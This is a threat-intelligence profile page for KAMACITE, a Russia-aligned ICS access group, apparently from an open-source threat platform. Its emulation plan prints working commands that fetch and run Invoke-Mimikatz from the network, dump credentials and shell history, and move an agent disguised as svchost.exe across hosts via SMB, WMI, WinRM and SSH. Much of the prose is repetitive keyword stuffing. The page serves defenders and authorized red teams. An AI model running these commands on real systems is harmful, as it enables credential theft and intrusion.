Home/Threat Actor/KAMACITE
Threat Actor

KAMACITE

kamacite · russia_aligned_state_actor_dragos_tracked_distinct_from_sandworm_electrum · active since 2014-01

KAMACITE is Dragos's tracked Activity Group designation for a long-running ICS-targeting threat group active since at least 2014 that operates as an "access-enablement team" enabling other entities, specifically ELECTRUM (Sandworm) , to deliver ICS-specific attacks, while not directly causing ICS disruptive events itself per Dragos canonical framing ("KAMACITE typically transfers operational control to other entities such as ELECTRUM in the 2016 Ukraine event, and some unknown entity in the 2015 Ukraine event, to execute ICS disruptive effects while maintaining access")

Russia-aligned attribution via Dragos canonical KAMACITE Activity Group designation + ELECTRUM-access-enablement-team framing + SecurityWeek canonical Four Additional Threat Groups Targeting Industrial Organizations 2020 coverage + CSO Online canonical Three new advanced threat groups 2024 coverage + Enterprise Times canonical Dragos 2024 lowered the barrier for OT/ICS attacks 2025 coverage + Dragos blog "New ICS Threat Activity Group KAMACITE" canonical access-enablement-team framing.

honest attribution caveat: KAMACITE operationally interleaves with Sandworm/ELECTRUM (already curated as sandworm_team) to the point that the Dragos-distinct-tracking-from-Sandworm methodology is best understood as a tradecraft-and-toolset cluster within broader Russia-aligned ICS operations rather than a fully separate APT, curated as standalone cluster to preserve Dragos- taxonomy disciplined-distinction methodology for analysts referencing Dragos terminology.

standalone cluster paralleling chernovite_pipedream + raspite_leafminer + covellite_lazarus_ics in v0.1.166 OT/ICS Dragos-taxonomy actor cluster cell.

operational target profile signature electric utilities + oil and gas operations + manufacturing longstanding per Dragos + US energy sector targeting per SecurityWeek 2020 + Ukrainian critical infrastructure via ELECTRUM-enablement 2015 + 2016 + post-2022 operations + European Oil & Natural Gas 2024 targeting expansion per Enterprise Times Dragos 2025 report.

operational attack architecture: (1) cluster-defining access-enablement-team operational model per Dragos distinguishing KAMACITE from disruption- execution actors with operational hand-off pattern transferring control to ELECTRUM for ICS disruptive effects.

(2) cluster-defining 2014 operational origin establishing 6+ year tradecraft consistency per Dragos ("While the group has evolved over time, many aspects of its operations and tradecraft have remained remarkably similar over the past six years")

(3) cluster- defining BLACKENERGY2 + BLACKENERGY3 + GREYENERGY custom malware framework delivery with historical phishing activity associated with delivery or follow-on download per Dragos canonical tradecraft signature.

(4) cluster-defining 2015 + 2016 Ukraine power event facilitation signature with 2016 Ukraine event canonical ELECTRUM hand-off pattern establishing distinct-but-interleaved operational model.

(5) cluster-defining compromised-third-party-server + Tor-nodes-relays + Virtual-Private-Server criminal-operations C2 infrastructure tradecraft per Dragos ("KAMACITE almost exclusively leverages compromised third- party servers for network infrastructure. Network infrastructure and communication frequently only reference server Internet Protocol IP addresses with rare use of domains... This includes Tor nodes and relays, and Virtual Private Server VPS instances associated with criminal operations"); (6) signature spearphishing with malicious attachments + external access via legitimate services replaying captured credentials initial access + Ukrainian political/financial themes + technical conference content phishing lures per Dragos canonical tradecraft.

(7) signature Mimikatz credential capture + PSExec lateral movement via built-in system tools + common administration frameworks per Dragos canonical tradecraft chain.

(8) signature 2024 European Oil & Natural Gas operational expansion per Enterprise Times 2025 Dragos report.

(9) signature 2025 SOHO router exploitation tradecraft evolution per Dragos threat groups summary 2025.

(10) signature IP-address-only C2 with rare use of domains operational distinctive pattern.

(11) signature US energy sector operational expansion 2020 per SecurityWeek; cluster fills the Dragos-KAMACITE-Activity-Group + Sandworm-ELECTRUM-distinct-but-interleaved- access-enablement-team + 2014-active-since + BLACKENERGY2-campaign-facilitation + 2015-2016- Ukraine-power-event-facilitation + BLACKENERGY2- BLACKENERGY3-GREYENERGY-malware-delivery + compromised-third-party-server-Tor-VPS-C2- infrastructure + phishing-Ukrainian-political- financial-technical-conference-lures + Mimikatz- credential-capture-PSExec-lateral-movement + European-Oil-Natural-Gas-2024-targeting + 2025- SOHO-router-exploitation position in OT/ICS Dragos-taxonomy actor cluster cell.

canonical illustration of access-enablement-team operational model + Dragos-taxonomy distinct-tracking-from- Sandworm methodology + long-running 2014+ operational tradecraft consistency + ELECTRUM operational handoff pattern + BLACKENERGY2/3/ GREYENERGY malware framework delivery + compromised- third-party-server + Tor + VPS C2 infrastructure distinctive tradecraft cited in essentially all subsequent Russia-aligned ICS-targeting industry analyses through 2014-2026 period.

russia_aligned_state_actor_dragos_tracked_distinct_from_sandworm_electrum confidence: high 21 aliases

Profile

KAMACITE is Dragos's tracked Activity Group designation for a long-running ICS-targeting threat group active since at least 2014 that operates as an "access-enablement team" enabling other entities, specifically ELECTRUM (Sandworm) , to deliver ICS-specific attacks, while not directly causing ICS disruptive events itself. Russia-aligned attribution via Dragos canonical KAMACITE Activity Group designation + ELECTRUM- access-enablement-team framing + SecurityWeek + CSO Online + Enterprise Times industry coverage. Honest attribution caveat: KAMACITE operationally interleaves with Sandworm/ELECTRUM (already curated as sandworm_team) to the point that the Dragos-distinct-tracking is best understood as a tradecraft-and-toolset cluster within broader Russia-aligned ICS operations rather than a fully separate APT.

Standalone cluster paralleling chernovite_pipedream + raspite_leafminer + covellite_lazarus_ics in v0.1.166 OT/ICS Dragos-taxonomy actor cluster cell.

Operational target profile
  • Electric utilities signature longstanding.
  • Oil and gas + European Oil & Natural Gas 2024.
  • Manufacturing.
  • Ukrainian critical infrastructure.
  • US energy sector Operational attack architecture: (1) Access-enablement team operational model (cluster-defining) (2) 2014 origin + 6+ year tradecraft consistency (cluster-defining) (3) BLACKENERGY2 + BLACKENERGY3 + GREYENERGY malware framework delivery (cluster-defining) (4) 2015 + 2016 Ukraine power event facilitation (cluster-defining) (5) ELECTRUM operational handoff pattern (cluster-defining) (6) Compromised third-party servers + Tor + VPS C2 infrastructure (cluster-defining) (7) Ukrainian political/financial + technical conference phishing lures (signature) (8) Mimikatz + PSExec credential capture + lateral movement (signature) (9) 2024 European Oil & Natural Gas expansion (signature) (10) 2025 SOHO router exploitation tradecraft evolution (signature) The cluster fills the Dragos-KAMACITE-Activity- Group + Sandworm-ELECTRUM-distinct-but-interleaved- access-enablement-team + 2014-active-since + BLACKENERGY2-campaign-facilitation + 2015-2016- Ukraine-power-event-facilitation + BLACKENERGY2- BLACKENERGY3-GREYENERGY-malware-delivery + compromised-third-party-server-Tor-VPS-C2- infrastructure + phishing-Ukrainian-political- financial-technical-conference-lures + Mimikatz- credential-capture-PSExec-lateral-movement + European-Oil-Natural-Gas-2024-targeting + 2025- SOHO-router-exploitation position in OT/ICS Dragos-taxonomy actor cluster cell.

Aliases

21
kamacitekamacite activity groupkamacite ics threat groupdragos kamacite trackingkamacite sandworm distinct dragos taxonomykamacite electrum access enablement teamkamacite long-running 2014 active sincekamacite blackenergy2 campaign facilitationkamacite 2015 ukraine power event facilitationkamacite 2016 ukraine power event facilitationkamacite ukraine power grid attack initial access enablementkamacite us energy sector targetingkamacite european oil natural gas targeting 2024kamacite phishing malicious attachments initial accesskamacite blackenergy2 blackenergy3 greyenergy malware deliverykamacite mimikatz credential capture psexec lateral movementkamacite compromised third party servers tor nodes vps c2 infrastructurekamacite soho router exploitation custom capabilitieskamacite ukrainian political financial themes phishing lureskamacite technical conference content phishing lureskamacite no direct ics disruptive event but facilitates electrum

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

10
2025KAMACITE 2025 SOHO Router Exploitation Tradecraft Evolution Signature
2024KAMACITE European Oil & Natural Gas 2024 Signature
2020KAMACITE US Energy Sector Targeting Signature (2020)
2016KAMACITE 2016 Ukraine Power Event, ELECTRUM Operational Handoff Signature
2015KAMACITE 2015 Ukraine Power Event Facilitation Signature
2014-2026Continued Industry Reference Status (2014-2026)
2014-2020KAMACITE Phishing + Malware Framework + Credentials + PSExec Tradecraft Signature
2014-2020KAMACITE Compromised Third-Party Servers + Tor + VPS C2 Infrastructure Signature
2014-2015KAMACITE BLACKENERGY2 Campaign Facilitation Signature
2014KAMACITE Origin, 2014 Long-Running ICS Targeting

Attribution & Reporting

Attributed by
Dragos (canonical KAMACITE Activity Group designation 2020-2021 + tracking through 2024)SecurityWeek (canonical Four Additional Threat Groups Targeting Industrial Organizations 2020 coverage)CSO Online (canonical Three new advanced threat groups targeted industrial organizations 2023 coverage)Enterprise Times / Ian Murphy (canonical Dragos 2024 lowered the barrier for OT/ICS attacks coverage)Dragos blog "New ICS Threat Activity Group KAMACITE" (canonical access-enablement-team framing)
Key reporting
reportDragos (2021): New ICS Threat Activity Group KAMACITE, canonical Activity Group designation
reportDragos threat profile: KAMACITE long-running 2014+ tracking + ELECTRUM access-enablement framing
reportSecurityWeek (2020): Four Additional Threat Groups Seen Targeting Industrial Organizations
reportCSO Online (2024): Three new advanced threat groups targeted industrial organizations last year
reportEnterprise Times / Ian Murphy (2025): Dragos says 2024 lowered the barrier for OT/ICS attacks
reportDragos threat groups summary (2025): KAMACITE SOHO router exploitation tradecraft addition

Operational

State sponsor

KAMACITE is Dragos's tracked Activity Group designation for a long-running ICS-targeting threat group active since at least 2014 that operates as an "access-enablement team" enabling other entities , specifically ELECTRUM (Sandworm), to deliver ICS-specific attacks. Per Dragos: "KAMACITE typically transfers operational control to other entities (such as ELECTRUM in the 2016 Ukraine event, and some unknown entity in the 2015 Ukraine event) to execute ICS disruptive effects while maintaining [access]." Honest attribution caveat: KAMACITE operationally interleaves with Sandworm/ELECTRUM (already curated in corpus as sandworm_team) to the point that several industry analysts characterize the Dragos-distinct-tracking as a taxonomic methodology choice rather than evidence of operational independence. Per Dragos: "KAMACITE represents a distinct set of tools, targets, and behaviors to gain and maintain long- term access within ICS networks." Per Dragos's access-enablement-team framing, KAMACITE is best understood as a tradecraft-and-toolset cluster within broader Russia-aligned ICS operations rather than a fully separate APT.

Attribution chain: (1) Dragos canonical KAMACITE Activity Group designation 2020-2021: per Dragos blog "New ICS Threat Activity Group: KAMACITE": "The new KAMACITE activity group represents a long-running set of related behaviors targeting electric utilities, oil and gas operations, and various manufacturing since at least 2014. The group facilitated Industrial Control System (ICS)- specific operations including the BLACKENERGY2 campaign and the 2015 and 2016 Ukraine power events. KAMACITE represents a distinct set of tools, targets, and behaviors to gain and maintain long-term access within ICS networks." (2) SecurityWeek + CSO Online canonical KAMACITE + ELECTRUM access-enablement-distinction attribution: per SecurityWeek: "KAMACITE's operations have overlapped with the activities of Sandworm (ELECTRUM), a notorious Russia-linked group that is believed to have launched disruptive attacks against Ukraine's power grid.

Despite the overlaps, Dragos believes KAMACITE is a distinct group that should be tracked separately. The company believes KAMACITE is an 'access-enablement team' that aids other teams specializing in disruptive operations." Per CSO Online: "ELECTRUM works hand in hand with another Russia-linked threat group that Dragos tracks as KAMACITE, which is the team responsible for gaining initial access into networks and collecting information." (3) Dragos KAMACITE phishing + malware + C2 tradecraft canonical signature: per Dragos: "Historical phishing activity is associated with delivery or follow-on download of custom malware frameworks such as BLACKENERGY2, BLACKENERGY3, and GREYENERGY. Examples of phishing lures used by KAMACITE include Ukrainian political and financial themes and technical conference content...

KAMACITE leverages initial access to victim networks to capture credentials using publicly available tools such as Mimikatz. This can be used via built-in system tools or common administration frameworks (such as PSExec) for remote access and code execution." (4) Dragos KAMACITE C2 infrastructure tradecraft: per Dragos: "KAMACITE almost exclusively leverages compromised third-party servers for network infrastructure. Network infrastructure and communication frequently only reference server Internet Protocol (IP) addresses with rare use of domains.

KAMACITE-specific activity frequently takes over servers used for other purposes for communications. This includes Tor nodes and relays, and Virtual Private Server (VPS) instances associated with criminal operations." (5) Dragos 2024 + Enterprise Times KAMACITE European Oil & Natural Gas + Russo-Ukrainian war continuation: per Enterprise Times 2025 Dragos report: "Kamacite and Electrum are Russian groups targeting critical infrastructure in Ukraine. The two work together with Kamacite breaching organisations and then handing that to Electrum.

Kamacite is also targeting European Oil and Natural Gas organisations." Cluster- defining 2024+ operational continuation signature. (6) Dragos 2025 SOHO router exploitation tradecraft addition: per Dragos threat groups summary 2025: "KAMACITE: Spearphishing, exploiting SOHO routers, and leveraging custom capabilities to enable ELECTRUM operations." Signature 2025 tradecraft evolution.

Operational target profile
  • Electric utilities signature longstanding per Dragos.
  • Oil and gas operations signature per Dragos.
  • European Oil & Natural Gas 2024 per Enterprise Times Dragos 2025 report.
  • Manufacturing signature per Dragos.
  • Ukrainian critical infrastructure signature per ELECTRUM-enablement 2015 + 2016 + post-2022 operations.
  • US energy sector signature per SecurityWeek The cluster fills the Dragos-KAMACITE-Activity-Group + Sandworm-ELECTRUM-distinct-but-interleaved- access-enablement-team + 2014-active-since + BLACKENERGY2-campaign-facilitation + 2015-2016- Ukraine-power-event-facilitation + BLACKENERGY2- BLACKENERGY3-GREYENERGY-malware-delivery + compromised-third-party-server-Tor-VPS-C2- infrastructure + phishing-Ukrainian-political- financial-technical-conference-lures + Mimikatz- credential-capture-PSExec-lateral-movement + European-Oil-Natural-Gas-2024-targeting + 2025- SOHO-router-exploitation position in OT/ICS Dragos-taxonomy actor cluster cell.
Motivations
russia_aligned_state_actor_dragos_tracked_distinct_from_sandworm_electrum, ics_specific_access_enablement_team_operational_model_signature, electrum_sandworm_disruption_operation_facilitation_signature, long_term_persistent_ics_network_access_capability_signature, blackenergy2_blackenergy3_greyenergy_custom_malware_framework_signature
Sectors
Regions

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)51/60 · 85%
Analytics (MITRE CAR)30/60 · 50%
Runtime / container (Falco)5/60 · 8%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)17/60 · 28%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

1 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
SOHO ROUTER EXPLOITATION CUSTOM CAPABILITIES 2025SPEARPHISHING WITH MALICIOUS ATTACHMENTS + EXTERNAL ACCESS VIA LEGITIMATE SERVICES REPLAYING CAPTURED CREDENTIALS INITIAL ACCESS
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin